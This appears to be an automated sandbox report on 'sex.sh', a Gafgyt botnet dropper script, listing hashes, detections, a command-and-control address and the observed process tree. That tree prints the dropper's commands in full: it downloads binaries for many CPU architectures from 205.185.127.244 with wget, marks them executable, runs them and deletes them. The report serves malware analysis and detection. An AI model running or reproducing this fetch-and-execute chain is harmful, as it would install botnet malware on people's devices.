Analysis
max time kernel: 44s
max time network: 53s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 28-09-2024 07:55
Static task: static1

Behavioral tasks (task, sample, resource):
behavioral1  sex.sh  debian12-armhf-20240418-en
behavioral2  sex.sh  debian12-mipsel-20240729-en
behavioral3  sex.sh  debian9-armhf-20240611-en
behavioral4  sex.sh  debian9-mipsbe-20240611-en
behavioral5  sex.sh  debian9-mipsel-20240729-en
behavioral6  sex.sh  ubuntu1804-amd64-20240611-en
behavioral7  sex.sh  ubuntu2004-amd64-20240508-en
behavioral8  sex.sh  ubuntu2204-amd64-20240611-en
behavioral9  sex.sh  ubuntu2404-amd64-20240729-en
General
Target: sex.sh
Size: 1KB
MD5: 884dc57dd0892038d53a2d4b017504df
SHA1: 52ab9780591ee9718ce6188a9edafc1afa05dcdf
SHA256: d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779
SHA512: 25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca
Malware Config
Extracted family: gafgyt
Extracted address: 205.185.127.244:23
Signatures

Detected Gafgyt variant (11 IoCs)
resource                          yara_rule
behavioral6/files/fstream-1.dat   family_gafgyt
behavioral6/files/fstream-2.dat   family_gafgyt
behavioral6/files/fstream-3.dat   family_gafgyt
behavioral6/files/fstream-4.dat   family_gafgyt
behavioral6/files/fstream-5.dat   family_gafgyt
behavioral6/files/fstream-6.dat   family_gafgyt
behavioral6/files/fstream-7.dat   family_gafgyt
behavioral6/files/fstream-8.dat   family_gafgyt
behavioral6/files/fstream-9.dat   family_gafgyt
behavioral6/files/fstream-10.dat  family_gafgyt
behavioral6/files/fstream-11.dat  family_gafgyt

File and Directory Permissions Modification (1 TTP, 13 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid   Process
1521  chmod
1544  chmod
1549  chmod
1557  chmod
1562  chmod
1506  chmod
1511  chmod
1516  chmod
1571  chmod
1576  chmod
1531  chmod
1536  chmod
1566  chmod

Executes dropped EXE (11 IoCs)
ioc          pid   Process
/tmp/mips    1507  mips
/tmp/mipsel  1512  mipsel
/tmp/sh4     1517  sh4
/tmp/x86     1522  x86
/tmp/arm61   1532  arm61
/tmp/i686    1537  i686
/tmp/ppc     1545  ppc
/tmp/586     1550  586
/tmp/m68k    1558  m68k
/tmp/dss     1567  dss
/tmp/co      1572  co

Modifies Watchdog functionality (1 TTP, 6 IoCs)
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description                    ioc                 Process
File opened for modification   /dev/misc/watchdog  x86
File opened for modification   /dev/watchdog       i686
File opened for modification   /dev/misc/watchdog  i686
File opened for modification   /dev/watchdog       586
File opened for modification   /dev/misc/watchdog  586
File opened for modification   /dev/watchdog       x86

Changes its process name (3 IoCs)
description                                                    pid   Process
Changes the process name, possibly in an attempt to hide itself  1522  x86
Changes the process name, possibly in an attempt to hide itself  1537  i686
Changes the process name, possibly in an attempt to hide itself  1550  586

System Network Configuration Discovery (1 TTP, 6 IoCs)
Adversaries may gather information about the network configuration of a system.
pid   Process
1510  wget
1512  mipsel
1514  rm
1494  wget
1507  mips
1509  rm

Writes file to tmp directory (11 IoCs)
Malware often drops required files in the /tmp directory.
description                    ioc          Process
File opened for modification   /tmp/x86     wget
File opened for modification   /tmp/arm61   wget
File opened for modification   /tmp/ppc     wget
File opened for modification   /tmp/mipsel  wget
File opened for modification   /tmp/sh4     wget
File opened for modification   /tmp/586     wget
File opened for modification   /tmp/m68k    wget
File opened for modification   /tmp/dss     wget
File opened for modification   /tmp/co      wget
File opened for modification   /tmp/mips    wget
File opened for modification   /tmp/i686    wget
Processes
(path, command line, PID; child processes are indented under their parent, and the signatures each process triggered are listed beneath it)

/tmp/sex.sh  /tmp/sex.sh  PID:1493
  /usr/bin/wget  wget http://205.185.127.244/mips  PID:1494
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/chmod  chmod +x mips  PID:1506
    - File and Directory Permissions Modification
  /tmp/mips  ./mips  PID:1507
    - Executes dropped EXE
    - System Network Configuration Discovery
  /bin/rm  rm -rf mips  PID:1509
    - System Network Configuration Discovery
  /usr/bin/wget  wget http://205.185.127.244/mipsel  PID:1510
    - System Network Configuration Discovery
    - Writes file to tmp directory
  /bin/chmod  chmod +x mipsel  PID:1511
    - File and Directory Permissions Modification
  /tmp/mipsel  ./mipsel  PID:1512
    - Executes dropped EXE
    - System Network Configuration Discovery
  /bin/rm  rm -rf mipsel  PID:1514
    - System Network Configuration Discovery
  /usr/bin/wget  wget http://205.185.127.244/sh4  PID:1515
    - Writes file to tmp directory
  /bin/chmod  chmod +x sh4  PID:1516
    - File and Directory Permissions Modification
  /tmp/sh4  ./sh4  PID:1517
    - Executes dropped EXE
  /bin/rm  rm -rf sh4  PID:1519
  /usr/bin/wget  wget http://205.185.127.244/x86  PID:1520
    - Writes file to tmp directory
  /bin/chmod  chmod +x x86  PID:1521
    - File and Directory Permissions Modification
  /tmp/x86  ./x86  PID:1522
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /bin/rm  rm -rf x86  PID:1525
  /usr/bin/wget  wget http://205.185.127.244/arm61  PID:1527
    - Writes file to tmp directory
  /bin/chmod  chmod +x arm61  PID:1531
    - File and Directory Permissions Modification
  /tmp/arm61  ./arm61  PID:1532
    - Executes dropped EXE
  /bin/rm  rm -rf arm61  PID:1534
  /usr/bin/wget  wget http://205.185.127.244/i686  PID:1535
    - Writes file to tmp directory
  /bin/chmod  chmod +x i686  PID:1536
    - File and Directory Permissions Modification
  /tmp/i686  ./i686  PID:1537
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /bin/rm  rm -rf i686  PID:1540
  /usr/bin/wget  wget http://205.185.127.244/ppc  PID:1542
    - Writes file to tmp directory
  /bin/chmod  chmod +x ppc  PID:1544
    - File and Directory Permissions Modification
  /tmp/ppc  ./ppc  PID:1545
    - Executes dropped EXE
  /bin/rm  rm -rf ppc  PID:1547
  /usr/bin/wget  wget http://205.185.127.244/586  PID:1548
    - Writes file to tmp directory
  /bin/chmod  chmod +x 586  PID:1549
    - File and Directory Permissions Modification
  /tmp/586  ./586  PID:1550
    - Executes dropped EXE
    - Modifies Watchdog functionality
    - Changes its process name
  /bin/rm  rm -rf 586  PID:1553
  /usr/bin/wget  wget http://205.185.127.244/m68k  PID:1555
    - Writes file to tmp directory
  /bin/chmod  chmod +x m68k  PID:1557
    - File and Directory Permissions Modification
  /tmp/m68k  ./m68k  PID:1558
    - Executes dropped EXE
  /bin/rm  rm -rf m68k  PID:1560
  /usr/bin/wget  wget http://205.185.127.244/dc  PID:1561
  /bin/chmod  chmod +x dc  PID:1562
    - File and Directory Permissions Modification
  /tmp/dc  ./dc  PID:1563
  /bin/rm  rm -rf dc  PID:1564
  /usr/bin/wget  wget http://205.185.127.244/dss  PID:1565
    - Writes file to tmp directory
  /bin/chmod  chmod +x dss  PID:1566
    - File and Directory Permissions Modification
  /tmp/dss  ./dss  PID:1567
    - Executes dropped EXE
  /bin/rm  rm -rf dss  PID:1569
  /usr/bin/wget  wget http://205.185.127.244/co  PID:1570
    - Writes file to tmp directory
  /bin/chmod  chmod +x co  PID:1571
    - File and Directory Permissions Modification
  /tmp/co  ./co  PID:1572
    - Executes dropped EXE
  /bin/rm  rm -rf co  PID:1574
  /usr/bin/wget  wget http://205.185.127.244/scar  PID:1575
  /bin/chmod  chmod +x scar  PID:1576
    - File and Directory Permissions Modification
  /tmp/scar  ./scar  PID:1577
  /bin/rm  rm -rf scar  PID:1578
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 107KB
MD5: 878511883ecf938a9b30e0a5eebb1b78
SHA1: 6f4192c09680a8cdec1c33fec77e40a96faeee15
SHA256: 777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533
SHA512: 8ea3f989940b431a6b994374fc322a0eb7933fe6791e947a573ad3e7d26f6a4ee8c72ae4d79e6d23be5f152df4e29934bb7e623a7530ac2752f4c6e3cf0181a4

Filesize: 174KB
MD5: 00c59b56e0ef93ffa2eacb7ffc355bc6
SHA1: e9f1a9fa3f2d7e9b8d40129dea37e82746609cea
SHA256: e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7
SHA512: 063a3293125b6981bafe1409bbf2b06ce21496a18496a39a4837f1bdad73e8dfb590118a1eab50e50504ef884a389e516090f485f7381c68f3233d290cdbadcf

Filesize: 174KB
MD5: 8d324a6048da1a123cef9a1465400ece
SHA1: dca6c1f2874c31de3b3b684ef99be2d82450d3bf
SHA256: 4cdd14a882e285d404b0da6a70470dfd5553a04352e30a6f7418c689f8f8916a
SHA512: 6ba9293bd1d81164d38cd46759aee0ff912b9354c71eb4a639695ed0c0829f4f2a846845647a4c72b295cac8fe2780f107336ea12ba10623df8f1fa4f3ca1f0e

Filesize: 135KB
MD5: 70445303ca15c2739d0c1d103fc77783
SHA1: 97bd19478d17211679b66692a7945ed38c9924e3
SHA256: 51bbbe5154ebaf34aceb846a0823dbd88cae1175cd90d6e741b89ad3fe16a5e0
SHA512: a3daa674f970158f76cbb83a10704e880d313d3e2615d486395f0c8339017c2fc1d98084ebe82bd3a6b5e898032e976c4440905c764eb0c048b3983f4b956b77

Filesize: 111KB
MD5: 9528d0e8ca08dae17e7e19ef7d13e035
SHA1: 5d1ff7764e03718af5ebe432c9b8d0d2e1d057ee
SHA256: 53c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e
SHA512: 72d6cd79bf99d095ee7009c3ff6569d7fbc0b950207aac061c4a289f9e89027519e1d7fa25f778a3131c0f57743ccdec5c30d4ebb8eabaa48ed61ceb18c4030e

Filesize: 129KB
MD5: 5f4fef5c575e8b3b11d8475dd4de719a
SHA1: 273104250032ebdc02e19b05bcf2b5b682e27368
SHA256: b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338
SHA512: 7103b1af22a821297fc1aab82e128936e306059ed055d979e5af418cc8e21ead7f2d28988816b8709be733a36eaccaca0a5d3f0fd17983400cb5e3daeb907e89

Filesize: 176KB
MD5: 24e07a16008a42f0a8dceb166b4b44cd
SHA1: 87f80fc2998304bc8735479faa75f509a6d5db13
SHA256: c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f
SHA512: b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

Filesize: 176KB
MD5: ac28a3dfa3ed9b815a8021a362b06607
SHA1: 93455b3775f586e230d8879489f9a6062de70677
SHA256: 3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5
SHA512: 94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

Filesize: 128KB
MD5: 184c7d44649ab256bd5705724bbec6a1
SHA1: baa0a75bd81f5985eb42ad0bdc282405b66af67d
SHA256: 3a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58
SHA512: ec1cd34debb06ce5c1571582f26b433ee34c7959fa1d1af0e1e6a0f9834f3d277916e8128d1b73ad569df89e7576b3b9a1a112dd08f10ddee00e30e821ffaa43

Filesize: 123KB
MD5: 5ec3c0e18b6fbc6e37bd611e2df8f9a4
SHA1: de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d
SHA256: 9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6
SHA512: 76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

Filesize: 127KB
MD5: 678363120cd2661f040670b90f211243
SHA1: 57d75e1c42243d08eb78623e6cdc6b066994a7ee
SHA256: cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a
SHA512: 5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55